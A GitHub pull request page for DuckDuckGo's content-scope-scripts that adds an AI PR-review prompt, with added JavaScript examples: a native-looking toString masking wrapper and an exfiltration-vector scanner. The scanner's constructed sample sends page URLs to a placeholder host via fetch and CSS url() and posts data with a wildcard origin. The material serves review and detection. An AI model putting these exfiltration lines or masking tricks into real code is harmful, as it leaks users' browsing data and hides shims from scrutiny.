Injected PR evaluation prompt#2419

Draft
jonathanKingston wants to merge 2 commits intomainfrom
jkt/auto/injected-pr-evaluation-prompt-e4b5

Conversation

@jonathanKingston (Contributor)

Asana Task/GitHub Issue: N/A

Description

Adds a new system prompt (.github/prompts/injected-pr-evaluation.md) tailored to evaluate Pull Requests for web compatibility and security issues within the Injected codebase and its messaging system.

Testing Steps

  • N/A (This is a static markdown prompt file with no runtime behavior.)

Checklist

Please tick all that apply:

  • I have tested this change locally
  • I have tested this change locally in all supported browsers
  • This change will be visible to users (as part of AI PR review)
  • I have added automated tests that cover this change
  • I have ensured the change is gated by config
  • This change was covered by a ship review
  • This change was covered by a tech design
  • Any dependent config has been merged


Tailored system prompt for automated PR evaluation covering:
- API surface fidelity (toString masking, descriptor shape, error types)
- Prototype chain integrity and cross-frame leakage
- DOM interaction safety and timing/race conditions
- Platform-specific breakage patterns (WebView, Firefox xrays)
- Third-party script compatibility (ad scripts, polyfill libraries)
- Captured globals hygiene and missing captures
- Messaging security (nativeData leakage, bridge trust boundary)
- Prototype/scope attacks (document.__proto__, stack trace manipulation)
- Data exfiltration vectors (postMessage, CSS injection, eval)
- Configuration trust and iframe security
- Risk classification aligned with cursor-review.yml workflow

Co-authored-by: Jonathan Kingston <jonathanKingston@users.noreply.github.com>
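The "API surface fidelity (toString masking, descriptor shape, error types)" item above is the kind of check a reviewer can make concrete. What follows is an added example, not code from content-scope-scripts or from this PR: a wrapper that replaces a native function while copying its name, length and descriptor shape and masking its `toString()` text, plus a checker that reports which observable signals still give the shim away. `wrapNativeLike`, `checkShimFidelity`, `makeTarget` and `runExample` are hypothetical names, and the target object and the 100 ms timestamp shim are constructed for the example.

```javascript
// Added example, not code from content-scope-scripts: an "API surface
// fidelity" check of the kind the PR's prompt asks reviewers to apply to a
// shimmed native function. All names here are hypothetical.

// Source text a native function reports from Function.prototype.toString.
const NATIVE_SOURCE_RE = /^function \w*\(\) \{\s*\[native code\]\s*\}$/;

// Replace `target[name]`, a data property holding a native function, with a
// method-shorthand wrapper (no own `prototype`, `this` forwarded, same name).
// `toString` is masked with an OWN property, which is the naive approach.
function wrapNativeLike(target, name, impl) {
  const desc = Object.getOwnPropertyDescriptor(target, name);
  if (!desc || typeof desc.value !== 'function') {
    throw new TypeError(`${name} is not a data property holding a function`);
  }
  const original = desc.value;
  const wrapper = {
    [original.name](...args) { return impl.call(this, original, ...args); },
  }[original.name];
  Object.defineProperty(wrapper, 'length', { value: original.length, configurable: true });
  const nativeSource = Function.prototype.toString.call(original);
  Object.defineProperty(wrapper, 'toString', {
    value: { toString() { return nativeSource; } }.toString,
    writable: true, enumerable: false, configurable: true,
  });
  Object.defineProperty(target, name, { ...desc, value: wrapper });
  return { original, originalDesc: desc, wrapper };
}

// Report which observable signals still distinguish the shim from the native.
function checkShimFidelity(target, name, { original, originalDesc, wrapper }) {
  const desc = Object.getOwnPropertyDescriptor(target, name);
  const has = (o, k) => Object.prototype.hasOwnProperty.call(o, k);
  return {
    installed: desc !== undefined && desc.value === wrapper,
    name: wrapper.name === original.name,
    length: wrapper.length === original.length,
    prototypeShape: has(wrapper, 'prototype') === has(original, 'prototype'),
    descriptorShape: desc !== undefined
      && desc.writable === originalDesc.writable
      && desc.enumerable === originalDesc.enumerable
      && desc.configurable === originalDesc.configurable,
    // `fn.toString()` hits the own property and is masked...
    ownToStringMasked: NATIVE_SOURCE_RE.test(wrapper.toString()),
    // ...but `Function.prototype.toString.call(fn)` bypasses it and shows the body.
    protoToStringMasked: NATIVE_SOURCE_RE.test(Function.prototype.toString.call(wrapper)),
  };
}

// Constructed target standing in for a global: a non-enumerable data property
// holding a real native (`Date.now`), the way `now` sits on `Date`.
function makeTarget() {
  const target = {};
  Object.defineProperty(target, 'now', {
    value: Date.now, writable: true, enumerable: false, configurable: true,
  });
  return target;
}

function runExample() {
  const target = makeTarget();
  // Hypothetical privacy shim: coarsen the timestamp to 100 ms.
  const shim = wrapNativeLike(target, 'now', function (original) {
    return Math.floor(original.call(this) / 100) * 100;
  });
  return { report: checkShimFidelity(target, 'now', shim), value: target.now() };
}
```

Run it with `node`. The report passes every signal except `protoToStringMasked`: an own `toString` property satisfies `fn.toString()` but not `Function.prototype.toString.call(fn)`, so a page script using the prototype method still sees the shim body. A shim that only masks the own property is exactly what a reviewer should flag under this heading; covering the prototype path means the replacement of `Function.prototype.toString` itself has to be part of the change under review.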
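For the "Data exfiltration vectors (postMessage, CSS injection, eval)" item, here is an added example, not the project's tooling and not part of this PR: a line-based scan over feature source for the vectors that item names. `findExfiltrationVectors`, `scanSamples` and both sample sources are constructed for illustration, the patterns are deliberately narrow, and the hosts `beacon.test` and `example.test` are placeholders.

```javascript
// Added example, not code from content-scope-scripts: a line-based scan for
// the exfiltration vectors the PR's prompt lists (wildcard postMessage,
// dynamic code execution, network requests, style injection). Names and
// sample sources are constructed for illustration.

const VECTOR_PATTERNS = [
  // postMessage whose targetOrigin argument is the wildcard '*'
  { kind: 'postMessage-wildcard-origin',
    re: /\.postMessage\s*\([\s\S]*?,\s*['"]\*['"]\s*\)/ },
  // eval / Function / new Function: code built from strings
  { kind: 'dynamic-code-execution',
    re: /\b(?:eval|new\s+Function|Function)\s*\(/ },
  // any new network request from feature code
  { kind: 'network-request',
    re: /\b(?:fetch\s*\(|new\s+XMLHttpRequest\s*\()/ },
  // <style> elements or inline style assignment with runtime values
  { kind: 'style-injection',
    re: /createElement\s*\(\s*['"]style['"]\s*\)|\.style\s*(?:\.\s*\w+\s*)?=(?!=)/ },
];

// Returns one finding per (line, pattern) match; line comments are skipped.
function findExfiltrationVectors(source) {
  const findings = [];
  source.split('\n').forEach((text, index) => {
    const trimmed = text.trim();
    if (trimmed.startsWith('//')) return;
    for (const { kind, re } of VECTOR_PATTERNS) {
      if (re.test(text)) findings.push({ line: index + 1, kind, text: trimmed });
    }
  });
  return findings;
}

// Constructed sample: feature code that leaks page state four different ways.
const SAMPLE_FEATURE = `
// constructed sample: feature code that leaks page state
const payload = { href: location.href, title: document.title };
frame.contentWindow.postMessage(JSON.stringify(payload), '*');
const style = document.createElement('style');
style.textContent = 'a[href^="' + location.pathname + '"] { background: url(https://beacon.test/log) }';
fetch('https://beacon.test/report?u=' + encodeURIComponent(location.href));
const run = new Function('return ' + settings.expr);
parent.postMessage({ ok: true }, 'https://example.test');
`;

// Constructed sample: the same feature with each vector removed.
const HARDENED_FEATURE = `
// constructed sample: explicit target origin, no dynamic code, no network
const payload = { ok: true };
parent.postMessage(payload, 'https://example.test');
`;

function scanSamples() {
  return {
    leaky: findExfiltrationVectors(SAMPLE_FEATURE),
    hardened: findExfiltrationVectors(HARDENED_FEATURE),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(scanSamples(), null, 2));
}
```

The scan is per line and regex based: a `postMessage` call split across lines, a `targetOrigin` held in a variable, or a `fetch` reached through an alias is not caught, and the `<style>` element is flagged on creation rather than on the `url()` that does the exfiltrating. It is a triage aid that points the reviewer at call sites; the judgement about whether page-derived data actually reaches them still has to be made by reading the code.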
@cursor (Contributor)

cursor Bot commented Mar 6, 2026

Cursor Agent can help with this pull request. Just @cursor in comments and I'll start working on changes in this branch.

@github-actions (Contributor)

github-actions Bot commented Mar 6, 2026

Build Branch

Branch pr-releases/jkt/auto/injected-pr-evaluation-prompt-e4b5
Commit 86a0e88a8c
Updated March 9, 2026 at 10:45:02 PM UTC


Integration commands

npm (Android / Extension):

npm i github:duckduckgo/content-scope-scripts#pr-releases/jkt/auto/injected-pr-evaluation-prompt-e4b5

Swift Package Manager (Apple):

.package(url: "https://github.com/duckduckgo/content-scope-scripts.git", branch: "pr-releases/jkt/auto/injected-pr-evaluation-prompt-e4b5")

git submodule (Windows):

git -C submodules/content-scope-scripts fetch origin pr-releases/jkt/auto/injected-pr-evaluation-prompt-e4b5
git -C submodules/content-scope-scripts checkout origin/pr-releases/jkt/auto/injected-pr-evaluation-prompt-e4b5
Pin to exact commit

npm (Android / Extension):

npm i github:duckduckgo/content-scope-scripts#86a0e88a8ce1455ec3d27156a046ed5f61df3705

Swift Package Manager (Apple):

.package(url: "https://github.com/duckduckgo/content-scope-scripts.git", revision: "86a0e88a8ce1455ec3d27156a046ed5f61df3705")

git submodule (Windows):

git -C submodules/content-scope-scripts fetch origin pr-releases/jkt/auto/injected-pr-evaluation-prompt-e4b5
git -C submodules/content-scope-scripts checkout 86a0e88a8ce1455ec3d27156a046ed5f61df3705

github-actions Bot added the label semver-patch (Bug fix / internal — no release needed) on Mar 6, 2026
@github-actions (Contributor)

github-actions Bot commented Mar 6, 2026

[Beta] Generated file diff

Time updated: Mon, 09 Mar 2026 22:45:31 GMT


@cursor cursor Bot left a comment


Cursor Bugbot has reviewed your changes and found 1 potential issue.

Bugbot Autofix prepared a fix for the issue found in the latest run.

  • ✅ Fixed: Prompt uses privacy-hostile term "user data"
    • Replaced the heading text 'URL construction with user data' with 'URL construction with page-derived data' to align with DuckDuckGo's privacy-first language guidelines.


Or push these changes by commenting:

@cursor push 1a4276c6b9
Preview (1a4276c6b9)
diff --git a/.github/prompts/injected-pr-evaluation.md b/.github/prompts/injected-pr-evaluation.md
--- a/.github/prompts/injected-pr-evaluation.md
+++ b/.github/prompts/injected-pr-evaluation.md
@@ -111,7 +111,7 @@
 ### 4. Data Exfiltration Vectors
 
 - **`postMessage` without origin restriction**: Any `window.postMessage()` or `iframe.contentWindow.postMessage()` without a specific `targetOrigin` (using `'*'`) leaks data to any listening frame.
-- **URL construction with user data**: Building URLs that include page-derived data (e.g., for image fetches, API calls) can leak browsing context to third parties. Verify all external URL construction.
+- **URL construction with page-derived data**: Building URLs that include page-derived data (e.g., for image fetches, API calls) can leak browsing context to third parties. Verify all external URL construction.
 - **`eval()` / `Function()` / `new Function()`**: Direct code execution from strings. The codebase avoids this in C-S-S itself (broker-protection serializes functions for native execution). Flag any new dynamic code execution.
 - **CSS injection**: If feature code injects `<style>` elements or sets `element.style` with page-derived values, CSS injection can exfiltrate data via `url()` or attribute selectors.
 - **fetch / XHR from content script**: Content script fetches may carry cookies and bypass CORS. Any new network requests from feature code are high-risk.
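Review bot: the reworded heading on the `+` line, "URL construction with page-derived data", now repeats the phrase its own body uses ("Building URLs that include page-derived data"), so the bullet reads as a tautology and the closing instruction "Verify all external URL construction" still gives the reviewer nothing to verify against. Suggest naming the inputs that count, for example "any external URL whose query, path or fragment carries `location.href`, `document.title`, element text or other values read from the page", so the model has a concrete criterion rather than a restated heading. Minor, same hunk: the `postMessage` bullet covers only the outbound direction (a `targetOrigin` of `'*'`); the inbound side, a `message` listener that does not check `event.origin`, is the same trust boundary and belongs either here or under the bridge-trust heading this PR's description lists.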

@github-actions (Contributor)

github-actions Bot commented Mar 6, 2026

⚠️ Cursor review was not successful.

This PR requires a manual review and approval from a member of one of the following teams:

  • @duckduckgo/content-scope-scripts-owners
  • @duckduckgo/apple-devs
  • @duckduckgo/android-devs
  • @duckduckgo/team-windows-development
  • @duckduckgo/extension-owners
  • @duckduckgo/config-aor
  • @duckduckgo/breakage-aor
  • @duckduckgo/breakage


@cursor cursor Bot left a comment


Web Compatibility Assessment

No findings.

  • .github/prompts/injected-pr-evaluation.md (entire file), severity: info: Documentation/prompt-only addition; no injected runtime behavior, API shims, prototype changes, or DOM mutations are introduced.

Security Assessment

No findings.

  • .github/prompts/injected-pr-evaluation.md (entire file), severity: info: No changes to trust boundaries (message-bridge, transports, captured globals, origin checks, or config execution paths); this cannot create a direct exploitable runtime path.

Risk Level

Low Risk — this PR introduces a static review prompt file only and does not alter shipped JavaScript execution in page or native messaging contexts.

Recommendations

  1. Add a CI check that validates required section headers in .github/prompts/injected-pr-evaluation.md to prevent prompt-format drift that could weaken automated review quality.
  2. Add a short owner/maintenance note in the prompt (or adjacent docs) describing when architecture/security references should be updated, to reduce stale guidance risk over time.
